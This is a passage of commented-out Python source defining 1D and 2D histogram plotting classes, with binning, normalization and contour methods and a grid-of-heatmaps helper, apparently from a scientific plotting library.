# aggregate counts of `x`.
# logx: bool
# If True, compute bins in log-space.
# axnorm: None, str
# Normalize the histogram.
# key normalization
# --- -------------
# t total
# d density
# clip_data: bool
# If True, remove the extreme values at 0.001 and 0.999 percentiles
# before calculating bins or aggregating.
# nbins: int, str, array-like
# Dispatched to `np.histogram_bin_edges` or `pd.cut` depending on
# input type and value.
# """
# super(Hist1D, self).__init__()
# self.set_log(x=logx)
# self.set_axnorm(axnorm)
# self.set_data(x, y, clip_data)
# self.set_labels(x="x", y=labels_module.Count(norm=axnorm) if y is None else "y")
# self.calc_bins_intervals(nbins=nbins, precision=bin_precision)
# self.make_cut()
# self.set_clim(None, None)
# @property
# def _gb_axes(self):
# return ("x",)
# def set_path(self, new, add_scale=True):
# path, x, y, z, scale_info = super(Hist1D, self).set_path(new, add_scale)
# if new == "auto":
# path = path / x / y
# else:
# assert x is None
# assert y is None
# if add_scale:
# assert scale_info is not None
# scale_info = scale_info[0]
# path = path / scale_info
# self._path = path
# set_path.__doc__ = base.Base.set_path.__doc__
# def set_data(self, x, y, clip):
# data = pd.DataFrame({"x": np.log10(np.abs(x)) if self.log.x else x})
# if y is None:
# y = pd.Series(1, index=x.index)
# data.loc[:, "y"] = y
# self._data = data
# self._clip = clip
# def set_axnorm(self, new):
# r"""The method by which the gridded data is normalized.
# ===== =============================================================
# key description
# ===== =============================================================
# d Density normalize
# t Total normalize
# ===== =============================================================
# """
# if new is not None:
# new = new.lower()[0]
# assert new == "d"
# ylbl = self.labels.y
# if isinstance(ylbl, labels_module.Count):
# ylbl.set_axnorm(new)
# ylbl.build_label()
# self._axnorm = new
# def construct_cdf(self, only_plotted=True):
# r"""Convert the obsered measuremets.
# Returns
# -------
# cdf: pd.DataFrame
# "x" column is the value of the measuremnt.
# "position" column is the normalized position in the cdf.
# To plot the cdf:
# cdf.plot(x="x", y="cdf")
# """
# data = self.data
# if not data.loc[:, "y"].unique().size <= 2:
# raise ValueError("Only able to convert data to a cdf if it is a histogram.")
# tk = self.cut.loc[:, "x"].notna()
# if only_plotted:
# tk = tk & self.get_plotted_data_boolean_series()
# x = data.loc[tk, "x"]
# cdf = x.sort_values().reset_index(drop=True)
# if self.log.x:
# cdf = 10.0 ** cdf
# cdf = cdf.to_frame()
# cdf.loc[:, "position"] = cdf.index / cdf.index.max()
# return cdf
# def _axis_normalizer(self, agg):
# r"""Takes care of row, column, total, and density normaliation.
# Written basically as `staticmethod` so that can be called in `OrbitHist2D`, but
# as actual method with `self` passed so we have access to `self.log` for density
# normalization.
# """
# axnorm = self.axnorm
# if axnorm is None:
# pass
# elif axnorm == "d":
# n = agg.sum()
# dx = pd.Series(pd.IntervalIndex(agg.index).length, index=agg.index)
# if self.log.x:
# dx = 10.0 ** dx
# agg = agg.divide(dx.multiply(n))
# elif axnorm == "t":
# agg = agg.divide(agg.max())
# else:
# raise ValueError("Unrecognized axnorm: %s" % axnorm)
# return agg
# def agg(self, **kwargs):
# if self.axnorm == "d":
# fcn = kwargs.get("fcn", None)
# if (fcn != "count") & (fcn is not None):
# raise ValueError("Unable to calculate a PDF with non-count aggregation")
# agg = super(Hist1D, self).agg(**kwargs)
# agg = self._axis_normalizer(agg)
# agg = self._agg_reindexer(agg)
# return agg
# def set_labels(self, **kwargs):
# if "z" in kwargs:
# raise ValueError(r"{} doesn't have a z-label".format(self))
# y = kwargs.pop("y", self.labels.y)
# if isinstance(y, labels_module.Count):
# y.set_axnorm(self.axnorm)
# y.build_label()
# super(Hist1D, self).set_labels(y=y, **kwargs)
# def make_plot(self, ax=None, fcn=None, **kwargs):
# f"""Make a plot.
# Parameters
# ----------
# ax: None, mpl.axis.Axis
# If `None`, create a subplot axis.
# fcn: None, str, aggregative function, or 2-tuple of strings
# Passed directly to `{self.__class__.__name__}.agg`. If
# None, use the default aggregation function. If str or a
# single aggregative function, use it.
# kwargs:
# Passed directly to `ax.plot`.
# """
# agg = self.agg(fcn=fcn)
# x = pd.IntervalIndex(agg.index).mid
# if fcn is None or isinstance(fcn, str):
# y = agg
# dy = None
# elif len(fcn) == 2:
# f0, f1 = fcn
# if isinstance(f0, FunctionType):
# f0 = f0.__name__
# if isinstance(f1, FunctionType):
# f1 = f1.__name__
# y = agg.loc[:, f0]
# dy = agg.loc[:, f1]
# else:
# raise ValueError(f"Unrecognized `fcn` ({fcn})")
# if ax is None:
# fig, ax = plt.subplots()
# if self.log.x:
# x = 10.0 ** x
# drawstyle = kwargs.pop("drawstyle", "steps-mid")
# pl, cl, bl = ax.errorbar(x, y, yerr=dy, drawstyle=drawstyle, **kwargs)
# self._format_axis(ax)
# return ax
# class Hist2D(base.Plot2D, AggPlot):
# r"""Create a 2D histogram with an optional z-value using an equal number
# of bins along the x and y axis.
# Parameters
# ----------
# x, y: pd.Series
# x and y data to aggregate
# z: None, pd.Series
# If not None, the z-value to aggregate.
# axnorm: str
# Normalize the histogram.
# key normalization
# --- -------------
# c column
# r row
# t total
# d density
# logx, logy: bool
# If True, log10 scale the axis.
# Properties
# ----------
# data:
# bins:
# cut:
# axnorm:
# log<x,y>:
# <x,y,z>label:
# path: None, Path
# Methods
# -------
# calc_bins:
# calculate the x, y bins.
# make_cut:
# Utilize the calculated bins to convert (x, y) into pd.Categoral
# or pd.Interval values used in aggregation.
# set_[x,y,z]label:
# Set the x, y, or z label.
# agg:
# Aggregate the data in the bins.
# If z-value is None, count the number of points in each bin.
# If z-value is not None, calculate the mean for each bin.
# make_plot:
# Make a 2D plot of the data with an optional color bar.
# """
# def __init__(
# self,
# x,
# y,
# z=None,
# axnorm=None,
# logx=False,
# logy=False,
# clip_data=False,
# nbins=101,
# bin_precision=None,
# ):
# super(Hist2D, self).__init__()
# self.set_log(x=logx, y=logy)
# self.set_data(x, y, z, clip_data)
# self.set_labels(
# x="x", y="y", z=labels_module.Count(norm=axnorm) if z is None else "z"
# )
# self.set_axnorm(axnorm)
# self.calc_bins_intervals(nbins=nbins, precision=bin_precision)
# self.make_cut()
# self.set_clim(None, None)
# @property
# def _gb_axes(self):
# return ("x", "y")
# def _maybe_convert_to_log_scale(self, x, y):
# if self.log.x:
# x = 10.0 ** x
# if self.log.y:
# y = 10.0 ** y
# return x, y
# # def set_path(self, new, add_scale=True):
# # # Bug: path doesn't auto-set log information.
# # path, x, y, z, scale_info = super(Hist2D, self).set_path(new, add_scale)
# # if new == "auto":
# # path = path / x / y / z
# # else:
# # assert x is None
# # assert y is None
# # assert z is None
# # if add_scale:
# # assert scale_info is not None
# # scale_info = "-".join(scale_info)
# # if bool(len(path.parts)) and path.parts[-1].endswith("norm"):
# # # Insert <norm> at end of path so scale order is (x, y, z).
# # path = path.parts
# # path = path[:-1] + (scale_info + "-" + path[-1],)
# # path = Path(*path)
# # else:
# # path = path / scale_info
# # self._path = path
# # set_path.__doc__ = base.Base.set_path.__doc__
# def set_labels(self, **kwargs):
# z = kwargs.pop("z", self.labels.z)
# if isinstance(z, labels_module.Count):
# try:
# z.set_axnorm(self.axnorm)
# except AttributeError:
# pass
# z.build_label()
# super(Hist2D, self).set_labels(z=z, **kwargs)
# # def set_data(self, x, y, z, clip):
# # data = pd.DataFrame(
# # {
# # "x": np.log10(np.abs(x)) if self.log.x else x,
# # "y": np.log10(np.abs(y)) if self.log.y else y,
# # }
# # )
# #
# #
# # if z is None:
# # z = pd.Series(1, index=x.index)
# #
# # data.loc[:, "z"] = z
# # data = data.dropna()
# # if not data.shape[0]:
# # raise ValueError(
# # "You can't build a %s with data that is exclusively NaNs"
# # % self.__class__.__name__
# # )
# #
# # self._data = data
# # self._clip = clip
# def set_data(self, x, y, z, clip):
# super(Hist2D, self).set_data(x, y, z, clip)
# data = self.data
# if self.log.x:
# data.loc[:, "x"] = np.log10(np.abs(data.loc[:, "x"]))
# if self.log.y:
# data.loc[:, "y"] = np.log10(np.abs(data.loc[:, "y"]))
# self._data = data
# def set_axnorm(self, new):
# r"""The method by which the gridded data is normalized.
# ===== =============================================================
# key description
# ===== =============================================================
# c Column normalize
# d Density normalize
# r Row normalize
# t Total normalize
# ===== =============================================================
# """
# if new is not None:
# new = new.lower()[0]
# assert new in ("c", "r", "t", "d")
# zlbl = self.labels.z
# if isinstance(zlbl, labels_module.Count):
# zlbl.set_axnorm(new)
# zlbl.build_label()
# self._axnorm = new
# def _axis_normalizer(self, agg):
# r"""Takes care of row, column, total, and density normaliation.
# Written basically as `staticmethod` so that can be called in `OrbitHist2D`, but
# as actual method with `self` passed so we have access to `self.log` for density
# normalization.
# """
# axnorm = self.axnorm
# if axnorm is None:
# pass
# elif axnorm == "c":
# agg = agg.divide(agg.max(level="x"), level="x")
# elif axnorm == "r":
# agg = agg.divide(agg.max(level="y"), level="y")
# elif axnorm == "t":
# agg = agg.divide(agg.max())
# elif axnorm == "d":
# N = agg.sum().sum()
# x = pd.IntervalIndex(agg.index.get_level_values("x").unique())
# y = pd.IntervalIndex(agg.index.get_level_values("y").unique())
# dx = pd.Series(
# x.length, index=x
# ) # dx = pd.Series(x.right - x.left, index=x)
# dy = pd.Series(
# y.length, index=y
# ) # dy = pd.Series(y.right - y.left, index=y)
# if self.log.x:
# dx = 10.0 ** dx
# if self.log.y:
# dy = 10.0 ** dy
# agg = agg.divide(dx, level="x").divide(dy, level="y").divide(N)
# elif hasattr(axnorm, "__iter__"):
# kind, fcn = axnorm
# if kind == "c":
# agg = agg.divide(agg.agg(fcn, level="x"), level="x")
# elif kind == "r":
# agg = agg.divide(agg.agg(fcn, level="y"), level="y")
# else:
# raise ValueError(f"Unrecognized axnorm with function ({kind}, {fcn})")
# else:
# raise ValueError(f"Unrecognized axnorm ({axnorm})")
# return agg
# def agg(self, **kwargs):
# agg = super(Hist2D, self).agg(**kwargs)
# agg = self._axis_normalizer(agg)
# agg = self._agg_reindexer(agg)
# return agg
# def _make_cbar(self, mappable, **kwargs):
# ticks = kwargs.pop(
# "ticks",
# mpl.ticker.MultipleLocator(0.1) if self.axnorm in ("c", "r") else None,
# )
# return super(Hist2D, self)._make_cbar(mappable, ticks=ticks, **kwargs)
# def _limit_color_norm(self, norm):
# if self.axnorm in ("c", "r"):
# # Don't limit us to (1%, 99%) interval.
# return None
# pct = self.data.loc[:, "z"].quantile([0.01, 0.99])
# v0 = pct.loc[0.01]
# v1 = pct.loc[0.99]
# if norm.vmin is None:
# norm.vmin = v0
# if norm.vmax is None:
# norm.vmax = v1
# norm.clip = True
# def make_plot(
# self,
# ax=None,
# cbar=True,
# limit_color_norm=False,
# cbar_kwargs=None,
# fcn=None,
# alpha_fcn=None,
# **kwargs,
# ):
# r"""
# Make a 2D plot on `ax` using `ax.pcolormesh`.
# Paremeters
# ----------
# ax: mpl.axes.Axes, None
# If None, create an `Axes` instance from `plt.subplots`.
# cbar: bool
# If True, create color bar with `labels.z`.
# limit_color_norm: bool
# If True, limit the color range to 0.001 and 0.999 percentile range
# of the z-value, count or otherwise.
# cbar_kwargs: dict, None
# If not None, kwargs passed to `self._make_cbar`.
# fcn: FunctionType, None
# Aggregation function. If None, automatically select in :py:meth:`agg`.
# alpha_fcn: None, str
# If not None, the function used to aggregate the data for setting alpha
# value.
# kwargs:
# Passed to `ax.pcolormesh`.
# If row or column normalized data, `norm` defaults to `mpl.colors.Normalize(0, 1)`.
# Returns
# -------
# ax: mpl.axes.Axes
# Axes upon which plot was made.
# cbar_or_mappable: colorbar.Colorbar, mpl.collections.QuadMesh
# If `cbar` is True, return the colorbar. Otherwise, return the `Quadmesh` used
# to create the colorbar.
# """
# agg = self.agg(fcn=fcn).unstack("x")
# x = self.edges["x"]
# y = self.edges["y"]
# # assert x.size == agg.shape[1] + 1
# # assert y.size == agg.shape[0] + 1
# # HACK: Works around `gb.agg(observed=False)` pandas bug. (GH32381)
# if x.size != agg.shape[1] + 1:
# # agg = agg.reindex(columns=self.intervals["x"])
# agg = agg.reindex(columns=self.categoricals["x"])
# if y.size != agg.shape[0] + 1:
# # agg = agg.reindex(index=self.intervals["y"])
# agg = agg.reindex(index=self.categoricals["y"])
# if ax is None:
# fig, ax = plt.subplots()
# # if self.log.x:
# # x = 10.0 ** x
# # if self.log.y:
# # y = 10.0 ** y
# x, y = self._maybe_convert_to_log_scale(x, y)
# axnorm = self.axnorm
# norm = kwargs.pop(
# "norm",
# mpl.colors.BoundaryNorm(np.linspace(0, 1, 11), 256, clip=True)
# if axnorm in ("c", "r")
# else None,
# )
# if limit_color_norm:
# self._limit_color_norm(norm)
# C = np.ma.masked_invalid(agg.values)
# XX, YY = np.meshgrid(x, y)
# pc = ax.pcolormesh(XX, YY, C, norm=norm, **kwargs)
# cbar_or_mappable = pc
# if cbar:
# if cbar_kwargs is None:
# cbar_kwargs = dict()
# if "cax" not in cbar_kwargs.keys() and "ax" not in cbar_kwargs.keys():
# cbar_kwargs["ax"] = ax
# # Pass `norm` to `self._make_cbar` so that we can choose the ticks to use.
# cbar = self._make_cbar(pc, norm=norm, **cbar_kwargs)
# cbar_or_mappable = cbar
# self._format_axis(ax)
# color_plot = self.data.loc[:, self.agg_axes].dropna().unique().size > 1
# if (alpha_fcn is not None) and color_plot:
# self.logger.warning(
# "Make sure you verify alpha actually set. I don't yet trust this."
# )
# alpha_agg = self.agg(fcn=alpha_fcn)
# alpha_agg = alpha_agg.unstack("x")
# alpha_agg = np.ma.masked_invalid(alpha_agg.values.ravel())
# # Feature scale then invert so smallest STD
# # is most opaque.
# alpha = 1 - mpl.colors.Normalize()(alpha_agg)
# self.logger.warning("Scaling alpha filter as alpha**0.25")
# alpha = alpha ** 0.25
# # Set masked values to zero. Otherwise, masked
# # values are rendered as black.
# alpha = alpha.filled(0)
# # Must draw to initialize `facecolor`s
# plt.draw()
# # Remove `pc` from axis so we can redraw with std
# # pc.remove()
# colors = pc.get_facecolors()
# colors[:, 3] = alpha
# pc.set_facecolor(colors)
# # ax.add_collection(pc)
# elif alpha_fcn is not None:
# self.logger.warning("Ignoring `alpha_fcn` because plotting counts")
# return ax, cbar_or_mappable
# def get_border(self):
# r"""Get the top and bottom edges of the plot.
# Returns
# -------
# border: namedtuple
# Contains "top" and "bottom" fields, each with a :py:class:`pd.Series`.
# """
# Border = namedtuple("Border", "top,bottom")
# top = {}
# bottom = {}
# for x, v in self.agg().unstack("x").items():
# yt = v.last_valid_index()
# if yt is not None:
# z = v.loc[yt]
# top[(yt, x)] = z
# yb = v.first_valid_index()
# if yb is not None:
# z = v.loc[yb]
# bottom[(yb, x)] = z
# top = pd.Series(top)
# bottom = pd.Series(bottom)
# for edge in (top, bottom):
# edge.index.names = ["y", "x"]
# border = Border(top, bottom)
# return border
# def _plot_one_edge(
# self,
# ax,
# edge,
# smooth=False,
# sg_kwargs=None,
# xlim=(None, None),
# ylim=(None, None),
# **kwargs,
# ):
# x = edge.index.get_level_values("x").mid
# y = edge.index.get_level_values("y").mid
# if sg_kwargs is None:
# sg_kwargs = dict()
# if smooth:
# wlength = sg_kwargs.pop("window_length", int(np.floor(y.shape[0] / 10)))
# polyorder = sg_kwargs.pop("polyorder", 3)
# if not wlength % 2:
# wlength -= 1
# y = savgol_filter(y, wlength, polyorder, **sg_kwargs)
# if self.log.x:
# x = 10.0 ** x
# if self.log.y:
# y = 10.0 ** y
# x0, x1 = xlim
# y0, y1 = ylim
# tk = np.full_like(x, True, dtype=bool)
# if x0 is not None:
# tk = tk & (x0 <= x)
# if x1 is not None:
# tk = tk & (x <= x1)
# if y0 is not None:
# tk = tk & (y0 <= y)
# if y1 is not None:
# tk = tk & (y <= y1)
# # if (~tk).any():
# x = x[tk]
# y = y[tk]
# return ax.plot(x, y, **kwargs)
# def plot_edges(self, ax, smooth=True, sg_kwargs=None, **kwargs):
# r"""Overplot the edges.
# Parameters
# ----------
# ax:
# Axis on which to plot.
# smooth: bool
# If True, apply a Savitzky-Golay filter (:py:func:`scipy.signal.savgol_filter`)
# to the y-values before plotting to smooth the curve.
# sg_kwargs: dict, None
# If not None, dict of kwargs passed to Savitzky-Golay filter. Also allows
# for setting of `window_length` and `polyorder` as kwargs. They default to
# 10\% of the number of observations (`window_length`) and 3 (`polyorder`).
# Note that because `window_length` must be odd, if the 10\% value is even, we
# take 1-window_length.
# kwargs:
# Passed to `ax.plot`
# """
# top, bottom = self.get_border()
# color = kwargs.pop("color", "cyan")
# label = kwargs.pop("label", None)
# etop = self._plot_one_edge(
# ax, top, smooth, sg_kwargs, color=color, label=label, **kwargs
# )
# ebottom = self._plot_one_edge(
# ax, bottom, smooth, sg_kwargs, color=color, **kwargs
# )
# return etop, ebottom
# def _get_contour_levels(self, levels):
# if (levels is not None) or (self.axnorm is None):
# pass
# elif (levels is None) and (self.axnorm == "t"):
# levels = [0.01, 0.1, 0.3, 0.7, 0.99]
# elif (levels is None) and (self.axnorm == "d"):
# levels = [3e-5, 1e-4, 3e-4, 1e-3, 1.7e-3, 2.3e-3]
# elif (levels is None) and (self.axnorm in ["r", "c"]):
# levels = [0.0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0]
# else:
# raise ValueError(
# f"Unrecognized axis normalization {self.axnorm} for default levels."
# )
# return levels
# def _verify_contour_passthrough_kwargs(
# self, ax, clabel_kwargs, edges_kwargs, cbar_kwargs
# ):
# if clabel_kwargs is None:
# clabel_kwargs = dict()
# if edges_kwargs is None:
# edges_kwargs = dict()
# if cbar_kwargs is None:
# cbar_kwargs = dict()
# if "cax" not in cbar_kwargs.keys() and "ax" not in cbar_kwargs.keys():
# cbar_kwargs["ax"] = ax
# return clabel_kwargs, edges_kwargs, cbar_kwargs
# def plot_contours(
# self,
# ax=None,
# label_levels=True,
# cbar=True,
# limit_color_norm=False,
# cbar_kwargs=None,
# fcn=None,
# plot_edges=True,
# edges_kwargs=None,
# clabel_kwargs=None,
# skip_max_clbl=True,
# use_contourf=False,
# gaussian_filter_std=0,
# gaussian_filter_kwargs=None,
# **kwargs,
# ):
# f"""Make a contour plot on `ax` using `ax.contour`.
# Paremeters
# ----------
# ax: mpl.axes.Axes, None
# If None, create an `Axes` instance from `plt.subplots`.
# label_levels: bool
# If True, add labels to contours with `ax.clabel`.
# cbar: bool
# If True, create color bar with `labels.z`.
# limit_color_norm: bool
# If True, limit the color range to 0.001 and 0.999 percentile range
# of the z-value, count or otherwise.
# cbar_kwargs: dict, None
# If not None, kwargs passed to `self._make_cbar`.
# fcn: FunctionType, None
# Aggregation function. If None, automatically select in :py:meth:`agg`.
# plot_edges: bool
# If True, plot the smoothed, extreme edges of the 2D histogram.
# edges_kwargs: None, dict
# Passed to {self.plot_edges!s}.
# clabel_kwargs: None, dict
# If not None, dictionary of kwargs passed to `ax.clabel`.
# skip_max_clbl: bool
# If True, don't label the maximum contour. Primarily used when the maximum
# contour is, effectively, a point.
# maximum_color:
# The color for the maximum of the PDF.
# use_contourf: bool
# If True, use `ax.contourf`. Else use `ax.contour`.
# gaussian_filter_std: int
# If > 0, apply `scipy.ndimage.gaussian_filter` to the z-values using the
# standard deviation specified by `gaussian_filter_std`.
# gaussian_filter_kwargs: None, dict
# If not None and gaussian_filter_std > 0, passed to :py:meth:`scipy.ndimage.gaussian_filter`
# kwargs:
# Passed to :py:meth:`ax.pcolormesh`.
# If row or column normalized data, `norm` defaults to `mpl.colors.Normalize(0, 1)`.
# """
# levels = kwargs.pop("levels", None)
# cmap = kwargs.pop("cmap", None)
# norm = kwargs.pop(
# "norm",
# mpl.colors.BoundaryNorm(np.linspace(0, 1, 11), 256, clip=True)
# if self.axnorm in ("c", "r")
# else None,
# )
# linestyles = kwargs.pop(
# "linestyles",
# [
# "-",
# ":",
# "--",
# (0, (7, 3, 1, 3, 1, 3, 1, 3, 1, 3)),
# "--",
# ":",
# "-",
# (0, (7, 3, 1, 3, 1, 3)),
# ],
# )
# if ax is None:
# fig, ax = plt.subplots()
# clabel_kwargs, edges_kwargs, cbar_kwargs = self._verify_contour_passthrough_kwargs(
# ax, clabel_kwargs, edges_kwargs, cbar_kwargs
# )
# inline = clabel_kwargs.pop("inline", True)
# inline_spacing = clabel_kwargs.pop("inline_spacing", -3)
# fmt = clabel_kwargs.pop("fmt", "%s")
# agg = self.agg(fcn=fcn).unstack("x")
# x = self.intervals["x"].mid
# y = self.intervals["y"].mid
# # assert x.size == agg.shape[1]
# # assert y.size == agg.shape[0]
# # HACK: Works around `gb.agg(observed=False)` pandas bug. (GH32381)
# if x.size != agg.shape[1]:
# # agg = agg.reindex(columns=self.intervals["x"])
# agg = agg.reindex(columns=self.categoricals["x"])
# if y.size != agg.shape[0]:
# # agg = agg.reindex(index=self.intervals["y"])
# agg = agg.reindex(index=self.categoricals["y"])
# x, y = self._maybe_convert_to_log_scale(x, y)
# XX, YY = np.meshgrid(x, y)
# C = agg.values
# if gaussian_filter_std:
# from scipy.ndimage import gaussian_filter
# if gaussian_filter_kwargs is None:
# gaussian_filter_kwargs = dict()
# C = gaussian_filter(C, gaussian_filter_std, **gaussian_filter_kwargs)
# C = np.ma.masked_invalid(C)
# assert XX.shape == C.shape
# assert YY.shape == C.shape
# class nf(float):
# # Source: https://matplotlib.org/3.1.0/gallery/images_contours_and_fields/contour_label_demo.html
# # Define a class that forces representation of float to look a certain way
# # This remove trailing zero so '1.0' becomes '1'
# def __repr__(self):
# return str(self).rstrip("0")
# levels = self._get_contour_levels(levels)
# contour_fcn = ax.contour
# if use_contourf:
# contour_fcn = ax.contourf
# if levels is None:
# args = [XX, YY, C]
# else:
# args = [XX, YY, C, levels]
# qset = contour_fcn(*args, linestyles=linestyles, cmap=cmap, norm=norm, **kwargs)
# try:
# args = (qset, levels[:-1] if skip_max_clbl else levels)
# except TypeError:
# # None can't be subscripted.
# args = (qset,)
# lbls = None
# if label_levels:
# qset.levels = [nf(level) for level in qset.levels]
# lbls = ax.clabel(
# *args, inline=inline, inline_spacing=inline_spacing, fmt=fmt
# )
# if plot_edges:
# etop, ebottom = self.plot_edges(ax, **edges_kwargs)
# cbar_or_mappable = qset
# if cbar:
# # Pass `norm` to `self._make_cbar` so that we can choose the ticks to use.
# cbar = self._make_cbar(qset, norm=norm, **cbar_kwargs)
# cbar_or_mappable = cbar
# self._format_axis(ax)
# return ax, lbls, cbar_or_mappable, qset
# def project_1d(self, axis, only_plotted=True, project_counts=False, **kwargs):
# f"""Make a `Hist1D` from the data stored in this `His2D`.
# Parameters
# ----------
# axis: str
# "x" or "y", specifying the axis to project into 1D.
# only_plotted: bool
# If True, only pass data that appears in the {self.__class__.__name__} plot
# to the :py:class:`Hist1D`.
# project_counts: bool
# If True, only send the variable plotted along `axis` to :py:class:`Hist1D`.
# Otherwise, send both axes (but not z-values).
# kwargs:
# Passed to `Hist1D`. Primarily to allow specifying `bin_precision`.
# Returns
# -------
# h1: :py:class:`Hist1D`
# """
# axis = axis.lower()
# assert axis in ("x", "y")
# data = self.data
# if data.loc[:, "z"].unique().size >= 2:
# # Either all 1 or 1 and NaN.
# other = "z"
# else:
# possible_axes = {"x", "y"}
# possible_axes.remove(axis)
# other = possible_axes.pop()
# logx = self.log._asdict()[axis]
# x = self.data.loc[:, axis]
# if logx:
# # Need to convert back to regular from log-space for data setting.
# x = 10.0 ** x
# y = self.data.loc[:, other] if not project_counts else None
# logy = False # Defined b/c project_counts option.
# if y is not None:
# # Only select y-values plotted.
# logy = self.log._asdict()[other]
# yedges = self.edges[other].values
# y = y.where((yedges[0] <= y) & (y <= yedges[-1]))
# if logy:
# y = 10.0 ** y
# if only_plotted:
# tk = self.get_plotted_data_boolean_series()
# x = x.loc[tk]
# if y is not None:
# y = y.loc[tk]
# h1 = Hist1D(
# x,
# y=y,
# logx=logx,
# clip_data=False, # Any clipping will be addressed by bins.
# nbins=self.edges[axis].values,
# **kwargs,
# )
# h1.set_log(y=logy) # Need to propagate logy.
# h1.set_labels(x=self.labels._asdict()[axis])
# if not project_counts:
# h1.set_labels(y=self.labels._asdict()[other])
# h1.set_path("auto")
# return h1
# class GridHist2D(object):
# r"""A grid of 2D heatmaps separating the data based on a categorical value.
# Properties
# ----------
# data: pd.DataFrame
# axnorm: str or None
# Specify if column, row, total, or density normalization should be used.
# log: namedtuple
# Contains booleans identifying axes to log-scale.
# nbins: int or str
# Pass to `np.histogram_bin_edges` or `astropy.stats.knuth_bin_width`
# depending on the input.
# labels: namedtuple
# Contains axis labels. Recomend using `labels.TeXlabel` so
# grouped: pd.Groupeby
# The data grouped by the categorical.
# hist2ds: pd.Series
# The `Hist2D` objects created for each axis. Index is the unique
# categorical values.
# fig: mpl.figure.Figure
# The figure upon which the axes are placed.
# axes: pd.Series
# Contains the mpl axes upon which plots are drawn. Index should be
# identical to `hist2ds`.
# cbars: pd.Series
# Contains the colorbar instances. Similar to `hist2ds` and `axes`.
# cnorms: mpl.color.Normalize or pd.Series
# mpl.colors.Normalize instance or a pd.Series of them with one for
# each unique categorical value.
# use_gs: bool
# An attempt at the code is written, but not implemented because some
# minor details need to be worked out. Ideally, if True, use a single
# colorbar for the entire grid.
# Methods
# -------
# set_<>: setters
# For data, nbins, axnorm, log, labels, cnorms.
# make_h2ds:
# Make the `Hist2D` objects.
# make_plots:
# Make the `Hist2D` plots.
# """
# def __init__(self, x, y, cat, z=None):
# r"""Create 2D heatmaps of x, y, and optional z data in a grid for which
# each unique element in `cat` specifies one plot.
# Parameters
# ----------
# x, y, z: pd.Series or np.array
# The data to aggregate. pd.Series is prefered.
# cat: pd.Categorial
# The categorial series used to create subsets of the data for each
# grid element.
# """
# self.set_nbins(101)
# self.set_axnorm(None)
# self.set_log(x=False, y=False)
# self.set_data(x, y, cat, z)
# self._labels = base.AxesLabels("x", "y") # Unsure how else to set defaults.
# self.set_cnorms(None)
# @property
# def data(self):
# return self._data
# @property
# def axnorm(self):
# r"""Axis normalization."""
# return self._axnorm
# @property
# def logger(self):
# return self._log
# @property
# def nbins(self):
# return self._nbins
# @property
# def log(self):
# r"""LogAxes booleans.
# """
# return self._log
# @property
# def labels(self):
# return self._labels
# @property
# def grouped(self):
# return self.data.groupby("cat")
# @property
# def hist2ds(self):
# try:
# return self._h2ds
# except AttributeError:
# return self.make_h2ds()
# @property
# def fig(self):
# try:
# return self._fig
# except AttributeError:
# return self.init_fig()[0]
# @property
# def axes(self):
# try:
# return self._axes
# except AttributeError:
# return self.init_fig()[1]
# @property
# def cbars(self):
# return self._cbars
# @property
# def cnorms(self):
# r"""Color normalization (mpl.colors.Normalize instance)."""
# return self._cnorms
# @property
# def use_gs(self):
# return self._use_gs
# @property
# def path(self):
# raise NotImplementedError("Just haven't sat down to write this.")
# def _init_logger(self):
# self._logger = logging.getLogger(
# "{}.{}".format(__name__, self.__class__.__name__)
# )
# def set_nbins(self, new):
# self._nbins = new
# def set_axnorm(self, new):
# self._axnorm = new
# def set_cnorms(self, new):
# self._cnorms = new
# def set_log(self, x=None, y=None):
# if x is None:
# x = self.log.x
# if y is None:
# y = self.log.y
# log = base.LogAxes(x, y)
# self._log = log
# def set_data(self, x, y, cat, z):
# data = {"x": x, "y": y, "cat": cat}
# if z is not None:
# data["z"] = z
# data = pd.concat(data, axis=1)
# self._data = data
# def set_labels(self, **kwargs):
# r"""Set or update x, y, or z labels. Any label not specified in kwargs
# is propagated from `self.labels.<x, y, or z>`.
# """
# x = kwargs.pop("x", self.labels.x)
# y = kwargs.pop("y", self.labels.y)
# z = kwargs.pop("z", self.labels.z)
# if len(kwargs.keys()):
# raise KeyError("Unexpected kwarg: {}".format(kwargs.keys()))
# self._labels = base.AxesLabels(x, y, z)
# def set_fig_axes(self, fig, axes, use_gs=False):
# self._set_fig(fig)
# self._set_axes(axes)
# self._use_gs = bool(use_gs)
# def _set_fig(self, new):
# self._fig = new
# def _set_axes(self, new):
# if new.size != len(self.grouped.groups.keys()) + 1:
# msg = "Number of axes must match number of Categoricals + 1 for All."
# raise ValueError(msg)
# keys = ["All"] + sorted(self.grouped.groups.keys())
# axes = pd.Series(new.ravel(), index=pd.CategoricalIndex(keys))
# self._axes = axes
# def init_fig(self, use_gs=False, layout="auto", scale=1.5):
# if layout == "auto":
# raise NotImplementedError(
# """Need some densest packing algorithm I haven't
# found yet"""
# )
# assert len(layout) == 2
# nrows, ncols = layout
# if use_gs:
# raise NotImplementedError(
# """Unsure how to consistently store single cax or
# deal with variable layouts."""
# )
# fig = plt.figure(figsize=np.array([8, 6]) * scale)
# gs = mpl.gridspec.GridSpec(
# 3,
# 5,
# width_ratios=[1, 1, 1, 1, 0.1],
# height_ratios=[1, 1, 1],
# hspace=0,
# wspace=0,
# figure=fig,
# )
# axes = np.array(12 * [np.nan], dtype=object).reshape(3, 4)
# sharer = None
# for i in np.arange(0, 3):
# for j in np.arange(0, 4):
# if i and j:
# a = plt.subplot(gs[i, j], sharex=sharer, sharey=sharer)
# else:
# a = plt.subplot(gs[i, j])
# sharer = a
# axes[i, j] = a
# others = axes.ravel().tolist()
# a0 = others.pop(8)
# a0.get_shared_x_axes().join(a0, *others)
# a0.get_shared_y_axes().join(a0, *others)
# for ax in axes[:-1, 1:].ravel():
# # All off
# ax.tick_params(labelbottom=False, labelleft=False)
# ax.xaxis.label.set_visible(False)
# ax.yaxis.label.set_visible(False)
# for ax in axes[:-1, 0].ravel():
# # 0th column x-labels off.
# ax.tick_params(which="x", labelbottom=False)
# ax.xaxis.label.set_visible(False)
# for ax in axes[-1, 1:].ravel():
# # Nth row y-labels off.
# ax.tick_params(which="y", labelleft=False)
# ax.yaxis.label.set_visible(False)
# # cax = plt.subplot(gs[:, -1])
# else:
# fig, axes = tools.subplots(
# nrows=nrows, ncols=ncols, scale_width=scale, scale_height=scale
# )
# # cax = None
# self.set_fig_axes(fig, axes, use_gs)
# return fig, axes
# def _build_one_hist2d(self, x, y, z):
# h2d = Hist2D(
# x,
# y,
# z=z,
